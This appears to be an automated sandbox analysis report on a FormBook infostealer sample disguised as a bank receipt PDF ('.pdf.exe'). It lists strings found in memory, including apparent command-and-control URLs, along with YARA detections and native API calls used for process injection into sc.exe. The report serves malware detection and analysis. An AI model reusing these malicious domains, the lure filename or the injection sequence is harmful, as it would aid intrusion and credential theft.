Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: sc.exe, 0000000E.00000002.4523397832.0000000004D46000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4523397832.00000000040B6000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4523397832.000000000538E000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4523397832.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.00000000038B6000.00000004.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002C26000.00000004.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://img.sedoparking.com
Source: sc.exe, 0000000E.00000002.4523397832.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002F4A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://jnkinteractive.co.kr/i9if/?_jePv=J/ZdKhwjcPNgkYWK8nNQGDYuFg//K8kO
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000002.2075185488.00000000024D9000.00000004.00000800.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 0000000B.00000002.2120592413.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.Ojaitangerines.com
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: sc.exe, 0000000E.00000002.4523397832.00000000046FE000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.000000000326E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4523355689.0000000004B66000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.maiilchannels.net
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4523355689.0000000004B66000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.maiilchannels.net/i9if/
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/10_Best_Plants_to_Grow_Under_Trees.cfm?fp=K0%2F962KgYemrl7hnegkWVe6c3A
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/Fruit_Trees_That_Are_Easy_to_Grow.cfm?fp=K0%2F962KgYemrl7hnegkWVe6c3Aw
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/Grow_Avocado_Tree_Quickly.cfm?fp=K0%2F962KgYemrl7hnegkWVe6c3AwnTGYbKX7
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/Grow_a_Cinnamon_Tree.cfm?fp=K0%2F962KgYemrl7hnegkWVe6c3AwnTGYbKX7wP35i
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/Plants_That_Grow_Under_Trees.cfm?fp=K0%2F962KgYemrl7hnegkWVe6c3AwnTGYb
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/__media__/design/underconstructionnotice.php?d=ojaitangerines.com
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4525225237.0000000006500000.00000004.00000800.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ojaitangerines.com/__media__/js/trademark.php?d=ojaitangerines.com&type=ns
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.consentmanager.net
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://delivery.consentmanager.net
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: sc.exe, 0000000E.00000002.4523397832.0000000004D46000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4523397832.00000000040B6000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000E.00000002.4523397832.0000000004248000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.00000000038B6000.00000004.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002C26000.00000004.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sc.exe, 0000000E.00000003.2449774741.0000000007FA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033E
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://=#
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: sc.exe, 0000000E.00000002.4525388172.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: sc.exe, 0000000E.00000002.4523397832.00000000040B6000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002C26000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=dreamdriss.lol
Source: sc.exe, 0000000E.00000002.4523397832.0000000004D46000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.00000000038B6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=lucathicke.com
Source: sc.exe, 0000000E.00000002.4523397832.0000000004248000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=oyoing.com
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.tucowsdomains.com/

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: initial sample Static PE information: Filename: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040C003 NtAllocateVirtualMemory, 10_2_0040C003
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B0F3 NtCreateSection, 10_2_0040B0F3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040A8B3 NtGetContextThread, 10_2_0040A8B3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040AAC3 NtSetContextThread, 10_2_0040AAC3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B313 NtMapViewOfSection, 10_2_0040B313
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040BBE3 NtDelayExecution, 10_2_0040BBE3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040ACD3 NtResumeThread, 10_2_0040ACD3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B543 NtCreateFile, 10_2_0040B543
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042BD13 NtClose, 10_2_0042BD13
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040A6A3 NtSuspendThread, 10_2_0040A6A3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B773 NtReadFile, 10_2_0040B773
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2B60 NtClose,LdrInitializeThunk, 10_2_01AC2B60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_01AC2DF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_01AC2C70
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC35C0 NtCreateMutant,LdrInitializeThunk, 10_2_01AC35C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC4340 NtSetContextThread, 10_2_01AC4340
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC4650 NtSuspendThread, 10_2_01AC4650
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BA0 NtEnumerateValueKey, 10_2_01AC2BA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2B80 NtQueryInformationFile, 10_2_01AC2B80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BE0 NtQueryValueKey, 10_2_01AC2BE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BF0 NtAllocateVirtualMemory, 10_2_01AC2BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AB0 NtWaitForSingleObject, 10_2_01AC2AB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AF0 NtWriteFile, 10_2_01AC2AF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AD0 NtReadFile, 10_2_01AC2AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DB0 NtEnumerateKey, 10_2_01AC2DB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DD0 NtDelayExecution, 10_2_01AC2DD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D30 NtUnmapViewOfSection, 10_2_01AC2D30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D00 NtSetInformationFile, 10_2_01AC2D00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D10 NtMapViewOfSection, 10_2_01AC2D10
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CA0 NtQueryInformationToken, 10_2_01AC2CA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CF0 NtOpenProcess, 10_2_01AC2CF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CC0 NtQueryVirtualMemory, 10_2_01AC2CC0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C00 NtQueryInformationProcess, 10_2_01AC2C00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C60 NtCreateKey, 10_2_01AC2C60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FA0 NtQuerySection, 10_2_01AC2FA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FB0 NtResumeThread, 10_2_01AC2FB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F90 NtProtectVirtualMemory, 10_2_01AC2F90
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FE0 NtCreateFile, 10_2_01AC2FE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F30 NtCreateSection, 10_2_01AC2F30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F60 NtCreateProcessEx, 10_2_01AC2F60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2EA0 NtAdjustPrivilegesToken, 10_2_01AC2EA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2E80 NtReadVirtualMemory, 10_2_01AC2E80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2EE0 NtQueueApcThread, 10_2_01AC2EE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2E30 NtWriteVirtualMemory, 10_2_01AC2E30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3090 NtSetValueKey, 10_2_01AC3090
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3010 NtOpenDirectoryObject, 10_2_01AC3010
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC39B0 NtGetContextThread, 10_2_01AC39B0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3D10 NtOpenProcessToken, 10_2_01AC3D10
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3D70 NtOpenThread, 10_2_01AC3D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03544340 NtSetContextThread,LdrInitializeThunk, 14_2_03544340
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03544650 NtSuspendThread,LdrInitializeThunk, 14_2_03544650
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542B60 NtClose,LdrInitializeThunk, 14_2_03542B60
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_03542BF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BE0 NtQueryValueKey,LdrInitializeThunk, 14_2_03542BE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BA0 NtEnumerateValueKey,LdrInitializeThunk, 14_2_03542BA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AD0 NtReadFile,LdrInitializeThunk, 14_2_03542AD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AF0 NtWriteFile,LdrInitializeThunk, 14_2_03542AF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F30 NtCreateSection,LdrInitializeThunk, 14_2_03542F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FE0 NtCreateFile,LdrInitializeThunk, 14_2_03542FE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FB0 NtResumeThread,LdrInitializeThunk, 14_2_03542FB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542EE0 NtQueueApcThread,LdrInitializeThunk, 14_2_03542EE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542E80 NtReadVirtualMemory,LdrInitializeThunk, 14_2_03542E80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D10 NtMapViewOfSection,LdrInitializeThunk, 14_2_03542D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D30 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_03542D30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DD0 NtDelayExecution,LdrInitializeThunk, 14_2_03542DD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DF0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_03542DF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C70 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_03542C70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C60 NtCreateKey,LdrInitializeThunk, 14_2_03542C60
